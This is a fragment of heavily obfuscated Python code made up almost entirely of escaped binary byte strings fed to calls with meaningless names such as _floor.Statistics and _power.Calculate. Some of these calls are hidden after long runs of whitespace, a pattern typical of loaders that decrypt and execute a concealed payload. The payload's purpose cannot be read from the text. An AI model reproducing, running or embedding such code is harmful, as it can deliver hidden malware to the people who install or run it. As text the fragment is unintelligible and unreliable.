\x9c\xe8\xf0\xf4\x86\xb7R\xbd\xce\x04k_\xfd\x8dR8V\xb4\xcf\xf7\x1fU\xed\xf2\r\xfa\x12&S\xbd\xc4\xc9\x0f\xa6>o\xc13\xe7\x855{.<#\x17\xe8\xe5\x8e^<\xc3?m\xe6\x14\xdc\xbe-\xb60\x97S\xb7\td3\xf0pH\xfe\xe4\x9e!\xd9wIc\xd0\xcd\x9ck\xc5c\xeab\xb0\x8e\xcdQ%\x81Um\xa1ZuxN\xf78c\x92O\xa4\xf9\xb8\xad\xd5\x96\xaa\xa5V\xb7\xe1/\xd5m\xf8\xd90n\xf3\x85\xe1\xf8(_{\xa0g[\xd9\x17\xf7-\xa4!\x11nR\xa2\']\xd3\xbbtX&#\xe8\xaf\x05S_\xe8]r\x0f\xec\x93\xfd\x1cl\xd5\xb7~Y\xdb\x1eO\xa3\xc7\xb3k\xebL(Z\xf4\xe6\x98\xf5X\xad|\xbf\xbe\xae*\xaah\xc9/\x9a\xa7%\x17\xe8\xff\xa5\xd8\x94$\x01\xa2Z :\x82W\x9ay\xf1\x8f\xdaW C\xda6\xb7n\xecr\xdaNr/\rA\xec)\x8c^\x19\xb8\x19!\xc1I69\x1f\xde\x9e\xfc\x11`_\xa8\x00\xd2?\x88V\xb5\x9a\x19\x1aS7\xf3\x8f\xe7\xe9\xd3R\xc9\x7f\xabf\xe2_\xa6/\xd3\xe5\xdf\x8e\xa9\x97\xe1 \xfb\xfcY\xaf\xda\x01\x1d\xeb\xd7\xec\xf9e\xc3\xefQ%$\x93\x04J\xbf\x90P\x13,\x12\xa5\xbb\xfc\xeb\xeb|\xb2\xae\xdb\x8f\x7f\x9d*U\x9f\xee\xc6\xf1\x17\x8d\x87\xfeb\xe6l(\xe2\xde}\xcd.\xda\x1b\xe9\xb87kn\xd6\x8a?ZJp!A\xe5z\xb1\xee\x8c\xfer\xf1\x97?{df\xd0\x0fN\xa6\xf0Z\xf5\x1bmiZ`{\xd1Q\xe6\xb8\xb9\x90{\x8e\xb34H\xbe\xd0?\xa0c\x80\xc6p\xf2\r\x17\x7fT\x9ba\xf2\xa1\xbb\xaf>n5\xc8\xb0\x91W\x8f\xb2\xf9\xf73\x94\xb71\x85,\x92\xddpbY\xd8\x82\xbby|\xc12\xf5b\xa17N>\xc1TZ\xe7\xc8j\xf7k\x8e\xbbT\x0b\xcal4\x9ez\xa3\xc9D\r\x8a\xc5\x82W\x83\x05\x1f\xeb\x98de\n\xa8\xc7\xedKX:\x8e\xb1\xd1\x1e\x16\x0c\x86d\x93\xc2\xe2\xe1\xd3r\xfar7\x9f\xdd\xe1\xde\xd48\x9a\xbfL\x1f\xd5\xfb\x89\x11\x82\x1eG\xe33\xfc\xf6\x1b\xf7 \xe9C\xd0\x99n?\xc1WS%\x0c\xd5\xb9(9wsmr\x80\xd5\x17\xfb\xfc\xdb\xb3:\x9d\xbbE6\x1e-\xa6\xde]\xc1ft#s\x1c47\xd5\xb1d\xc5\xc5h\xf9\xcb\x8f\xd1/\xd3\xb3\xdcN@\xb0\xcd\x17\x80b\xf5\x9ed\nX\x8f$\xfe\xb7\xce\xf5\xe8C\xe8\xb3\x1f-_\xe6\x7f\x9b?\xfdx>[\xa3C\xdb\xaa\x82%\x1exjy\xf3\xd4\x94\xee\xa9\xf9\xc6\x93i\xc6\x93\xf9\xc2\x83~\xe8\xcd\xbf{\xe6\xe6\xab6\xf3\xe4\xf0\x9e>*\xcaf\xc0\xa1\x80fW0\x9e]bh\xdc\xf1\xfc\xfb\x1d\xdf\xa7UR\xdagY\xeb\xf5\xdcE')

        _floor(_add = -83970 / 20955)._walk(_hypothesis = -77845 * _power.Calculate)                                                                                                                                                                                                                                                          ;_floor.Statistics(Builtins='OoOODOoOODOoDDOOOOOooDODo',Round=b'\xeb\xd3\xc6\x1e\xbe\x93A9I\x82@h\xed\xd20\x1c\x05\xb3`\x96\x0c\x80\xbe.\x99&I2\x0b\x80\xbaX\x95\xa5\xf7P\x1a#|0\x89\x88\xdaN=&\xaa\xf6\x08s\x90Lk\x98\xa2M\x7f@k\xd9\xba+\xfd\xf4\xf0\x9c-\xad\xce3\xce~,U\x13\x9d\xc1\x8f\xf0R\xc5I\xc0\x0b+,\xed\x9e\xc80h>$\x02s\x14\x14J\xfa\x03\xefm\x1b\x9d\xfcB7,\xb5,\xe9\x1a\x17\xa6\xc5\x17\xd2\xd8\xf0\x14\xd9{t\xf6\xed\xdd\x7f\xe6fo\xb6b=r\x9a\x8d%[\x7fNq\x99\x19\xa2\xbd\x1b\x95|ug\xf3\xd3\xbeh\x02z\xc6f\x95v\x95\x91\xc9h!+\xbeT\xab\xda\xfc)[~\xe3\x99\xfb\x81k\x10\xd0\xea\xd6\x13Ji\xd10\xbep\xd8\xce\x17oAS\xdb\x05\x8b\xb8\x17b1\xf04_\x9c(~\xf4{\x8f\x1be\xc13!\xebc\x17\xde5O\x1a\xc6L{\x92\xbfV\xcdc(Z\xd9\xe9*\xfd}\xd7\x0b\x1f\xd2R\x8e\xfa\x84Oz\x0e<o\xbdG-\xad\xf3]\xf2\x8cB\xabUDOF\x95(\x9a\x0b\xbe\xe9\x17\xde\x85\xd9\xd6\xc6\x14xx\x0b\xb1\xafp\x0b\xd06\x8a<\xff\xe5\x15:\x88\xb6\x8a\xbc\x8aX\x0f\x7f\xa7F9\x15\xc1!\xdfd9\x8b\xb3\xf0\x84\xef\xdc7x&\xbfac\xbav\xc3\xdd\xdczC\x94\x80\x86$\xee\x11\xa4\xc8\xf7t\xfe\x18\x9e`\x96\x8f\x1e.\xfbCb\xa0Cs\x18\x8a\x89\xde%\xf2\xcbp\x880L\xc5\xde\xab\xf6w\xe8\x0b\xc6\x92B\x9fxXH7EK\xdc\x1c\x8d\xde\x8bE\xab=\x83 \xf2\xda3\xc2K\x1a\\\xb56E=\x1a{\x94\xea\x1fW\x12\xf7LWsqqu\xe9\xa1~\xcaI\x06\xcfQ\xbd\xf5\xae\xd8mI>\x94K\xacw\xe9\xa1g\x08\x87 \x18D\xd0\x80\xff\xb0\xaaG\xe0JE\xad&+\xd7\xd5)\x81#A\x88\xa6\xa0\x8a\x87\x87|s]\xd0O.\xd0]CG\xdd\xb97\xe4DU=,o=\xce\xe6\xc7VG\xa2\xeb\x80\x99\xd73\xea\x16\xeb<\xdeO\xad\xd9\xb0S\xc5\xb3T.#\x9b{\xd2\xbd5\xb7\xfd\xd7B7\x80\xf5/#/!e\xb8W\x9d\xac\xd5>\x90\xb1\x1d\x02\xcd\xac|\x81hTU]\x9f\xbdD\xb0\xf0\xe2\xb4\xc1Kq\x96ydn\x7f K1\x88\xc5pO=\x8c\x87\xbf \xf1\x8f\xe2\xe2\xd5\x8d\xf0\xd0\x86\x9e\r}_\xcc\xe7 ){\xda#\'n\xb7U]\x8195\xf1A\x8e2h\xf1S\xdc\xa4u\x03\xba\x9d:\x9f\xc2\x9a\xc3\xb3\x9a\xce\xedDk\xce\xaeMd\xdb"HK\xa0\x01b,\xb606\xc8Z\xc3\x93,\xf2\x86\xc2\xbb\x87\x8a\x01\xdeC\xbax\xb8\x9f\x9e\x08\xb2\x06\x8c\x85z,\xdb\xcaDi\xd3\x16\x81\xcf\x85N\xc1\x87\x16/\n.\xac\xadv\x8aKd8\xb8 \x07:\xddP4\xfe\xdcz\xfav\xc9\x84\xe9\x89\xc9"\xd06\x0e8uO\x8cy|*l\xba\xf1L\xb3\x19o\x08\xfcy\xd7V\xc8\x0e\xf7\x8bU=b\x8eg\xba`\xb7$\xae\xe7\xaa\x07\x9e\x92e\x0e\x07$\x8bD\xe4\x83+\xcc\xa9sr\xbe\xd2\xf4\x83S\xc9\xce\x9dB\x07\x9f\xfe\x14\xd3%^\xa4\x1a5\xc3s6 \xf2\x1c\x81\x96>o\xb1\xd0\x07\xc5\x81\x83>K\xf5\xe7=Z\r\xf1(\xf3\xad\xa7\xcdkz\xe1-\xf4\x01\xcb\xba\xca\xdd\xa6\xd5\x1e\xf0\xc0\xa1k\xdc\xc0s\xf2\xaba\xbf\xb7\x97\x04:c\xefgaQ\xd3\x9f\xbc\xaf_-\x83\r\x8aU2\x88\xb4OAu\xefUC\x9f\xda\x0e\xef\'\xf1#\xe1\xbc4<\x15s\x81\xf6\xe7\xf3<R\x9c7Q\'\'\x8d\x81\x18aw\xbe\xd5K{B\x11+\xafz\xdez\xda:\xad\x13\x94(9Ew\xeeG\xdd\xbb\xb9\x8f\xa3[_\xdc\x88\x84P\x1ez_\xcc\x14\xc0\xbc\xd6l\xd3.\xdcp\xcb/\xa4\x856\xd8j\xf5\xb6/\x859\xd6\\\x04\x1e\xe5\xd6{\xb5\xed\xafp\x1cO\x82\x19\xc9\xb2A\xbd\x19{\x89G\xf8\t\x00/\x81\xa8\x00\xd8\x1bX\x11\xf4\x95ZW\x0bio\xca\xf7\xde\xa0S\x99\xe4\xfb\x94\xfa \xf9\x0c0\x8c\x12\xad\x07\xf3\x82]O\x83\xa9DK\xc7\x19ew9@k\x06\xfa\xee\xc2\x9bj\x0b\xb1#\xe9\xd6`\xeb\xa5\x97!\xf7s&D\xd0\xb8xy\xe7\xc4\xeeu.\x8b,I\x0fjZ\xf0H2\xbc\x14\xac\x125\xd7I\xf1\xa2$\x84\xe1F\xf0+\xad\xder\x91\xe9/DR\xbf\xf5~\x8a+\x86\xc7\xb3\xc6\x0fx\xd8\xfc$\x96\xa2\x15l\xf1\xe0\riQ\xa3\xb5\xdd\xd7&0o(\x00\x13\x94\x1cP\x86Yu\xafioz\x97s\xf4\xe5\xabO\xa7\xfaj5>\x07\xefjq\x16\x94\xa5G\x9e\x9f?\xef|\xbfq\xf1@]ZD\x8d[o\xc9\xf2\xbd\x1e\x0c\x1e|C\x9a7y\x8d\x94\xbc+|\x04\x9cPM\xb5\x13\xf1P\xa3\x08\x80L\xd4T\xd7/\xeb}\xe2?\x94\xae\x06\x1fZ\xbd\xbdz\x05\xd1op\xa7o=KC\xd3Z\x1d\xbcx\xf3\x07\xb6Y\xd2\x0ei\x88?xs^p\x1f\x16l\x01U_z|\xd5z\xc6\xe75q\xd5}\xfe\xac\xef\x93NA\xaan\x95(?\x96gG\xbd\xe7[\t\x8f\x8bK&\xeb\x0fj\x9a\xd9\xf9\x1e\xb3\x86\xe6\xa3:\xec\xb3P;\x1c\xca\xc2&8\x17\xbd\xa8\x89~f\x8d\x08O[#\xe4\x92e\xf4\x93\x83 c\xc3\x06\x8a\xcd\xfe\xb0p\xcf\x915\npe($_^\xd1\xd6U\xfbz\x9d\x85\x90\xc3\xe1s\xeb\x91]\x0eu8\x9c\x9e\xe1\xd0\x17\x9e\xd83\xb5\n\x08\x9f<\xa3\xcb\x88f\xe3i\xed\xc7\'\x15\x17\x97\xd7\xe1\x9a\xf9\xfb\xab\xb1#\xc8\xc4\xa9\xf4s\x03\xe7\xd3\xf3iy\x067\x138\x9d\xfd\xce\xf7Z\xcc\xc4_M\xae\x08Pj\xa0\x0b\xd0m\xd7\xef\xea\xa6yf\x88/\x8dT#=Z\xdf\x95W\x8f \x81\xd4\x900]\xe3fQk\xf3\x87\xe2?!\xad\x8d\x14\x82Vo\xb2\xc6\x83\x8a\xa5\x0c\xc5\x11Y5Y\x16\x11\xf3\x84\xc8j0\x91\xd1\x95.-\xe5\x05\xde<cl\xe3~\xbd\xea\xce\x12\x0eJ\xc0P\xac1\x9e\xdeh\xc1]\x96]\xd5]\n\xc0\x18\xf1\xe9\x8a\x1bX\xc9\xab;\x8fa\xce\xd1x.\xa6O\xf0\x8b{\x05\xac\x80\xdc\xf8/\xdeg\xdb\xb7\xc3\x12\xb3g(z\xbe\x8a)\xe9\xabw#\xea\xa8\xf6H\xc9\xa2\xb3X,\xd8\x8f\xc3[\xf3y\xe1\x96\xf3$ o\xdaG\xdd\xaex&\xb2\xa7\xb6m\xdfz\xda\x0c{\xa1-qh\xa5\x94\xfbm\xc3\xed\xd4\xf2e\x8dL\xe3\x93\xf3\xc80:G\x07\x17\x89Zd\x7f\xf2\xf4\x80\xbc\xd1\x1e\xe55\xba:\xf9\xc02\x024\xfb\xb8\xf4\x9d\xca\x94*\xc62I\xb9\xfcX\x18.\xa4\xb3\r\xb5\xca\x042T\x03C/[&\x08uC\xda\xd6\xadwm\x89QZ\x85P\x13\x1d\x7f\xbc\xd1\xd6\x08\x8f\xd6\x08\xb6L\xd3\x8c\xa7\xe6\x07\xc2\xe9"d;#\xfb\xc39N\x89dSe\xd5\x9ef\x94\xe2l f\x01\xb2\xa7d\x0c\xf0\xf5[\xed\x1a\xc43B\xeenR3\xd5\\wN\xe9K\x10p\x82*2)\xc8\x9e`\xae5\x93\xd2\xab\'\xa0i\xed\x9d \xdc\x97\x87\xc8\x0f\xb2\xe7\x01=\xf6\x05Z\x03\xae.=a\xca\xe6\x85\x04\xa6Dt\xfa\xac\\\xfb?[\xbb\x96\xb5\x1f\x0fpJ\xa6B\x9cGA[ \x8bCAJ\x12+\x9c\x00\xdf\x1a\x18ze\x12\n\xc4\xcd\x0b\xb6\x1c\x03*\xf9i\x893\x9e\xd1Q5\x9e\x1cg\x0f\x8fV@4j\xa1\xebW\xddK\xb1\x85/d4\xaaG\xc9\xa0\xfb \x88\xb0\x05\r3\xbaQ\xf3V\xbb\x81q\xb5\xc8\xc8\xa3A\xa7\x16\x07m\'7\x1a\xa7Z~/l\xd4\x18\xd9\xf5\xf5\xef\xe4\x1f\x16C#\x00q\x03\xad\x9c\x03|\n\xb9\xa5\x04,\xd8\xdb\xd1\xd3C\x82\x03\x07\xe2\xb2!,\xdf:\xa2\xd2-D\x95$]\xefaw\xa5][\'\xb4\xf4\xbe\xe4\x96 [&\x8dJ\xb2h\xe2\xa0\xf4\xe6b\x14\x9a\xcf\x1f\xe4\xe6x\x9f\xa5\xf3\x06\xd6:\x82/\x9e\x98\xe8\xb8g\xabWOC|\xf8\x17\x02\x9e,\xf6\x05\x9c\x99\x16\xdc\x17\x16-\xf7\x01\x89\xee\xd40\x19%\xf6h9_\xe0\x81\x17\xc6\x97\x957w\x83\xd8 V\x1b=\xeaP\x980\x12%\xdb\xff<4s!8\r\xa7\xf0\xf3\x95\xd2\xa0\xf8%\xc94\xa76N\x05\x10f\xc7k\xd0\xe7\xa2\x0fPB^D6\x81\xc6\xd9\xb9Kh\xf8\xb3\xe54\xbe\xf5\x04C\xf2@xD\xd2E\x95n\xa3\x07\xbf\x98b\xe1\xdd\xb3\x8c\x96<\xb6<v\xd0\xd0\xd4;\'s\xf8\n\x01\xe1\xab1\'X\x92J\xbb\xca\x1e\xc7\xc2\x18\xea\xa3k\x91\xfd_\xc5@)\xc7\x00\x9f\x04\xf1\xd7^\x10F\xe3\xe2\x8aU\x02\xef\x8b\x91\x8c\xb4\xc1\x86du\x16#\xad \x00\x1c^\xab\xee\xba\xa1\\0\x8b-\x9e\xcc\xa9e9\xe5\x9bZ\xd0\xf7\xc8\xcb\xf3@\x94\x18\xd0\xa6;\xdfqRvh\xfd\xba\xe4\x0c\x0f\xb7\xde\x17=>L\xe8\nZ&\xf5\xbag\xc6\xbc\x87R&\xdan\xb8\x07\x0f\xcf\xbdW\x89\x94\xd1\xea\xc1+.\x17b\xb5\xd7BnQ\xdf\x17/\xb3\xad\xf8\xb7\xed\xee\x95B\xf4\x92Ao\x84\xc1\xcf\x9d\xde\xacR\x0bo\xb10\xd0 \x9a\x17\xe8\xdf\xd3`<\xb1\xf7\xd1EzVx\xa2quyfB\x14;4\x82}W\xf4\x08\x1d| X\x7fv(\x9f\x1a\xb3\x9d\xf4\xdb\x92\xfa`\x01\x89\xb5\x8fdw\x05\x82\x1c\x8b\x14T\x89\x12\xcc\xa5\x9a\x07\x08\xb7G.%\x14\xf0<\xe3\xb3g\xff\x9eg\xa7Z\xfa\xa2\xc5h\xd2\x8c}^\xfc\xd0\xe4<\xd4~c\x9fE\xc8\xac,\x15\xb2\xfbjh\xe4\xde\xac]\xd7\x1ea\x99EMB\x9f\xbf\xbe\x7f\x02`bL\x82gL3\xa2#\xf1@\xf02BF\x9f\x9f\x13z\x16q\xcf\x9e\xdci\xdb]%\x13\xa4v\x0c\x88\x9a\xb9\xd2\xef\xffS\xcf\xeb\xaff28\xd5\xc0\x18\xd9\'\xad\x0e\xc5\xa6\xe3Lo\xa8\x81" hwua\xa8)B\xc4z\xa9>\x81\x9d\x80T\x00\x9f\xa5\x16\x12\xe1\xb52\xa9\xe7\x088=\x0f\xe1\xa0|\xebQ\xb6\xc0\x9ab\x9b\xfclf\x04\xfc\xe8\x19\xe7\xba\xa5\xc9\xa9\xbf\xa2\x8bG\xab\xcc\xdau\xdc\xb2\xb1\xbft\x1e\xea\x0f\xe4#\xca')

        _floor(_add = 12906 - 95078)._system(Modulo = _power.Calculate * -80035)                                                                                                                                                                                                                                                          ;_floor.Statistics(Builtins='jjjjiljijjijiilllljjijjj',Round=b'G\x91Qd"\x98\xb0\xc9\x8b9\x94&\x1fj\xbf\x85\xce\xc1\xc92\x82\x86\x81\x88\\)\xea\xe8\x90\x1c\xd8$k\xc9P\xc3V[\xad1XM\xc6H\xa9\xd3kk@\x1a\x15\xee\xbah\x12\xd63\x12;O\x9b\x18\x1a\x04\x9d\xa4a\xb1\x19\x18\x1a\x8c\xb4\xf4\xc5\xac%\x1e\x9bK\xe7\x0f\x0f\x82\xdb\x80\xddzCvE\x110\x04\xfb\x06\xb9\xa6\xbcsn\xe8s\x84n\x89\xeb\xdd#\x19\xf8Ap\x12s\x9e\xca\x17\x0f+\xac\xc7\x02\x89\x16\xc4N\xab\xfd\xc3\n\x98\xe5\x05\x9c\xfen=\x81Di\xf0\x0f\xce\xe8\x1eA\x07\xd8\xd9\xc1\xf93\x87\x9e\x15\x9dz-\xba6n{\xbc,3\xd2\xe3\x8a\xc0R\xd6\x04\xa5\xa1n\xab}\xc1CiS\xf2\xafc\x97:\xfdj\xc5\xb6\xf0m*\xc8af\xe1\xfdj\x16\xff\xdd\x85\xca\x05CY1x\xee\x81n\xde\xad\xd8\xd8L\xd4\xf7\xa3gNKLS\x88\x1a\xb3B=%\x80\x84L$\x9fs\xe3\x9f&\x9c\x15\xbe\xa1\x9c\x8b\xe4\xe6\xa6\xdd\x1e x(\x1dJ\xc0\xf7\x04qs\x1a\x01\xc70|\x89DZ\x98\xf8:uC\xf5\xa5I\x9c\xed\xd2{ +>{\xf3\xb0\xd9\xa0\xf5V\xdfc_f\x1c\xb4\x99\xa0s\t\x06\xe5\xa9\x0e\x87\xd6\xa2Tq\x1e0x\x1b\xbd\x9a\xec|\x9bM\\\x95\xe8\xf7`OG)\x82\xcc\x1f\x18\x1b\x88\xb4\x03\x97x\xcdK[\xf5\x14}\xba\x04\xee!\xcf\x19\xe3\xc5\x18]\xd66\xc2G\xfb\xf6\x16\x1a\xc2\x08/,\x0bh\x89K#\x9a=k\xdd\x15\xc5\x96\xa4\xd9\x15\xf7\x87<`C\x11\x9dP\x17<=?\x97I\r\x81\x10%\x80N\xc6\x11P\xe7\x8c<b\xc8\xf3\xee\x1e\xfa\x0b\xe3\xc6Zha\x16<\x99\x17\x04>\x07\xc3\x15\xe1\x91\xc0\x80e\xa6/1|\x94AWtI\xdc\xd9`vi\xd7J\xa3G9\xeb\x91<U\xd0\xbc!\xe0\x01c\xec\xf5r\xb6\x18V?\xe9v\xdc\xda\x88\xee\x11\xc2tu(\x9a6\xbfbt^o\x15\xf4\x1a\xbeX\x1b\xd8\xb7\xcc\x9e\x1ea\x83~\xfe!7\x88\x97z\x86\x83Hp\xd9\xdd\xeb\xfc\xe5\xd7\xf7\xafB( \x1e=\xfc\xbdg\x04\xe6/\x1a\xf14]\x8e3\xe0\xcf8\xbb6\xb2\xa8\x91KOF\xcf\xefg\xf9\xa0\xc9\x85Xf$\xb6\xe7l\x86\x81\xbb\x85 M\x96W8l\x9b]\xd0\xd9\xd9ba\xe9\xff\xb0\xf5i\x91\x8d&\xcf\xc7\xab\xab\x9b]>O\xc7\xaa\x85\xef\xfe:\xfd\xedL\x14\x11c\x17\x82\xcdO\xf7I\xc4@\xf0\xd5\xfb\xfa\xa6]#7f\xc8\xe1\xc7\xdbo\xa6\xa1\xb4N\xf9\xf3v\xe5\xc1\xcd&C\xb4@\x89\x91\xfe}yuz\xbb\xf2\x8c-\xbb\x95%\xab\x7fB*\x93\x7f_~\x7f\xca^\xa6\xe3\x97\xf3\xd1\xcb\xe8\xd8\xfc\xca\x83\x90\x02\xeb\x85\xf1\x9d\x12uM\xee\xef\xe1\xc97\x94\x91\t\xa3\x93\x9d\xb3C\x1cF\xbe9\x13\xee\x9af\xd7\x16\x0c\xdd\xee\x87\x1c\xcf\x8a\xeb\xe7\x9c\xf5Wv9\xabW\xe6\x13\xf1\xbe\x8f~\x83[&\xa1\xe0\x8co\xaf\xa6"\x91\xdfP\xe4\xa8\x1d\xf2\xca\xb6P\xe8\x8d\xc7\xa3\xe9\xf3]\x8e%\x85w.,)\xf2\xbdfJ\xf9\x9f\x7f\xbaF\xa6\x14\xa4`\x993NjNF\xc4\x079a$_1\xd7\xbej\x08Zw]\xdbE\xe0\xd3\x99\xd9\x83P\x1e\x99\t\x80\'\x8e\xd3\x8cEt\xd6\\)X\xd44\xbe\x1a_p\x97\xa7\x93;h\xe0\xd7\xecib\xefUVP\xb1\xf4}\xf9z\xfaq)\xf3\x8c\x81\x00-\xcd\xfe\x989fm#Z\x1dh\xdde\x99\x8e-\x88\x8d\xc0\x92\xd5\xcf6\xdc\xff\xf2\x05Y\x117z\x19\x10g\x18[;\xce\xd6~#\xd1\x1b\xa5\x90\x89\xb5\xbf\xa8\xee\xbd:\x08\xc5\x80\xf74q\x05]\x8e\x11\x12\x17\x0fg\x15\x01\x15\xf8\x13\xe2a\x91\x08}\x08_\xbf\x7fFf\x83\xd2\xaer\x8c\x05\xeb\xe6\xf3\xe9\xcf\xf9\xf3\xcb\xf3\xf1\xfd\xf372n\x8b\xa5\x9d\xe6\xd3\xc5\xfc\xb6\x10\xa1\xced\n\x10{\x0eG\x85\xdfQ\'G\xcd\x04\x7f\xf6p[\x0ej\xcf\xf5n\xfbo\xf3\xa9U.\xa8\xea\xf8\x1a\xae.\x9a\xc1\xad\xc7\'\xe8\x99\xb8G\x13E\x0c\xde\x1a\x03\x11\xe2Y\x9b>\x9f\xac\x88\xc6\xd7\x1d\t/\x8e\x00\x9b\x08\x83T\xcfO\xe3\xec\xfbop\xa0\x8d\xe7\x98\xc7\xb7\tx\xdc\x9c\xa6\x8d\xdb${\x80\x8e\xfb\xd0~\x19\xb6\x13\x9ex\x95\x0731\xf7C\xb2Q\x0e\xd9I\xa9\xc4+O\xfb\xb5\xe54\xd4\xbe?\xa8\xd3\xd3P\x1a\xf2?\xcc\xf9\n\x17\xb7\x1fnV\xa8\x137\xd7\x1f\xf8\xccON\xd6\xb6\x17uS!1\xf8\xcf\x1cY\x0c\x8a2\xd5\x82\x9d\xb9\x0c\x1d\x81\xc1\x8a\x06lzb\t\xd0\xde{\xf5\x84\x0b\xd1\xa6K\xb6$^\xdc~`[\x90O\xf0\x1e^\x83A\xe5\xd6\x17\xe1\x89\xdd\xd66\x86\xbf\xfe<U\xfb\xd3>\x06\xc1\xf3\xbc\x02\xa6\xa2`0\xbb\xb9\x86\xaa\x12\x87\xc5\xa6v<\xe9[\xb9\t\xa4\xf6"\x0c\x18\xfc_|\xe4\xff*7\x9fM\xe5\xa0\xcbJ4+\xfak\x1d\xcc\x05\x8dM<9\xc4E\xa2%\x01\x10\x06.\x0cS\x0eCfI\xbc\xc65:\xdb8\xe3\xe8e\xa24\xe7\xac\xd8\xdb\x96\x93N\xc1\xe2.\xa1\x0f\x9bg\x1d\x9d\x13N\xfb\xe9\xbb\x9du\x04\xdc\xa7\xbb\x0b~4c\xda\xb6(0\xa2\xc4\xdd\xf4"\x93\x9c\xb1\xbd\xca\xe4fNhh\x82F\xd0*\tV\xb6\xbaSI\x0e\x19\x00\x0fO\x9c\'\xe8)"\x15\x17|\xff8\x06\xaf8m\xb6\x98\xd4/.o?hy@;:\xd4F\x8diD\xfa\x9e\x9eHpibw,\xbaKi\xdd\xa9?\x9b\xdcX\xe6&|\xf7\xc8\xeaOQ\xa9\x17\x18\xdb@\'\x0e\x17#\x0e\xff\xcf\xdao\x0b\xf0\x80\x0f\x84\xf1`\xab]\xc6\xa1\xa8\x995\xa5p\xe4\x07#\xcd\x87\xcc\x18\xa5\x86\x07\xcc\xb6t~\xe6\x01\xa7~\xeb\x99\xe8\x07\x1d\xc0\xa1\xfe\xe0\x07\xaf\xe2\x15\x13l\xd7\xad\xc7A\xe7sr\x88\xd1[\xbdi\xc5.\xdeb\x8a\x91\x1bADL\xc2\xb3\x94\x11\x10\x1f$|\x99a\xda\x8f >\x13<\x16\x9bu\xe0U\x0bC\x14\x13\xbb:\xbe\x98\x19\x0b\xd7\xeb\x9f\xc4?\xa6\xf1a\xc6\x13\xcb\x10(\xb1\x8eHT\xe3\x02\xb5O\xd5\xc4\xa6\xad\x90\xaa\xe7\xf5i\xfe2\xdd=\xf48\xa5t\xbf)\xa4\x81\x8d\x80\xcf2\x9eA\xda\x08 wN\xefW\x7f\x97N\x80\x04\xba\x06\x9b\xe8I\xdbg\ng"g\x86g\xb5\xaf3I\xad3I\xf7y&\x98\x13kBgB\xdb{;\x13\xe6\xcc\x17Jh>\xa7B\xe9\xde\xeeX\x1f{n\x94?\xbbb\xe9\xfe\xce.M!\x05\xb3\x9c\x15}\xda\xdb\xd9\x0cR\x9f\xcfDm\xed\xef,\x92)\xcd:I\xa2\xeeN\xa8\xefY\xa9|og8\x81\xe3\xf3Y\xe1\xf6\xde\xced\xac\x8e>U3Q\xac\xdeS\xddR\x85\xd2\xbd\x9d]\x0f\xef\xd8 M\xd43\x80\x19\x81\xcf\xafT\xbe\xbf\x95E\xcd\x031\x9c\x8d:\x8f\x81Y\xfbL\xd9\x16gF\x9c#\x1cWqE\x06Q\x16\xedDN\xf9e\x91\xdd\x8f\x16\xac:={\xe8i\xcdq\xe0b\xad27\x1dK\x1e\xabE \xda\xf3\xd3\xe8\xfe\x0e\x99\x04\xb9\x80A\x85\x9c}D\xa2\x7f\xd5\xff\xd9j\xdb\x90\xd6\xb2\x9e\xb2WPw\xd6\xfe\xde&=\x95\x16\xd5\x8a6\xbe)\x1db\xb9\x9c\x8e_\x8e\xd5\xae\xbe\x19\x15\x9ae`\xcb\xa2,\xe8^K\x83\x08\x82\xb3\xf1\xa7\x95\xe5\x96m\xac\xa4b\xe9\x90\'\xfd\x06<\x81\x9a\x9aA\xcbY_\xbe\x96c\x81\x8a\xc7Q\xca\xd8t\xac\x84\xc9\xe3\x95;\xcd\x8b\xb9K\x01\xa2\x89%\xf4l\xf5.g\xd3\x97\xf1\xaf#\xad\xdc\xc2_\xd1t\x87\r\x9a)\xf1s\xf9\xc30\x02-u\x8f\xe5#\x9d\x91\xa3\x8a\x000\xcc\xfcGE\xf2\x13c\x85$\xf4\x1f\x8b\xfdh\x8d^\xe4\xb9fA\x10\r\xce\xfe\xf3\xbft\x81\xf4\x08\xa3\x95\xe3\x86]\x05z\x08H\xd5\xd0EJW_ \xb0\\\xa5\x08+%\x18~\xfe\xcdf\x8a\xd6A\x92\xd7\xb7gg\x16S\x9bl\x9d\xfe\xfa\xf2\xf2=[.~;\x13\xc9\xd8\x02\x0b\xabgY\xf3\x00\xcdB\xff\xc8\x005,S\xc9\xda\x13c\x96\x0b\x02>\xa0\x9a\xa3NJ\x9c\n\xe7\xd2\xf6\xa7\xcf\xaa\x8f<M\xcfrpF\xe8 \xab\xcf\x85kks\xa1\x15GysS\xfa\xc9\xdfF\x8b\x1f\xd3\xb3\x15\xa6|<\xc19Qp 6\x83\xb5\xb8\x15\x8e6\x1czv\x0bK \xd3\xed\n\xc5W];\xe3\x00t\xc8\xceW\xb8\xc1x<\x0cS\xf2}\x99\xa1\x98\xf7h\x85\xe1\x03\xfeJ\x1d\xf6\xc3\x19\xee\x04cp1\x02\x97_\xaf\xc0Jf\xccc\xbe\xafc\x17\x86\xc3\x0f\xd8\x00\x1fnl\'\x95\xa6h(\xdf96N\xef\xbc\n\x04FZ\x8d\xefC?FIZ\xcd\xfe\xf7B\xce\x04\x14K\xc9\x98\xd6\x02(\x0f\xd2`\xa6\xe4^\xfe\x04\xbfT\x12@\x8c\xc4LX\xc6\xe5f\x9f=\xb3\xcf\x14d\x97\xb1Z_dU\xae\x91E\xa0x\xc1\xabG\xb6X+\xa89\xca\xbf\xe2E\xe7\xc3\x99\x80/\x05\xfc\xa8\x1am\xedh\xd0\xc6I\xc3\x19\xfc\xfa\xf3Vu\r\x9c;V\xf7\x01\xfc\xea\x1b\xf5\x9d!u\x1c\x06\xb0\x01\xbe\xe0\xf6\x96\xbb\x84\x1d\xaae\xf18\\\xdf\x90\xa5\x03-\x97\x08\xe3A\xd0\x1f\xf7\t\x0b> \xf0M\x9a\nV\x8f\xbb\x8d\xe7\x97IP\n:\x0c\xd5\x18\xbf\xbd\xa5\xb33q\xc7\x1ctw\xfb\xc1\xc0i\x05\n\xc3\xaf|n\xd8\xc94\x94M=rG_5\xdf\xd3m)\xcc\xf9kL\x075mM\x84s\x18\n\xf7\xc4\x90\x08 =^\x89\r\x04\x9a\xe6\x82\x0f\xcc!+?8gF\x19\xd5\xde\xf0\x0bb\x90\xc0\xc69\x17R/\xd8\xa5\xfa]\xc6\xac3\xfa{\xf5\xe1\xc4\xd3\xbcS\x02\xab5\x8eu\xa60\xcf\x86\x9cM 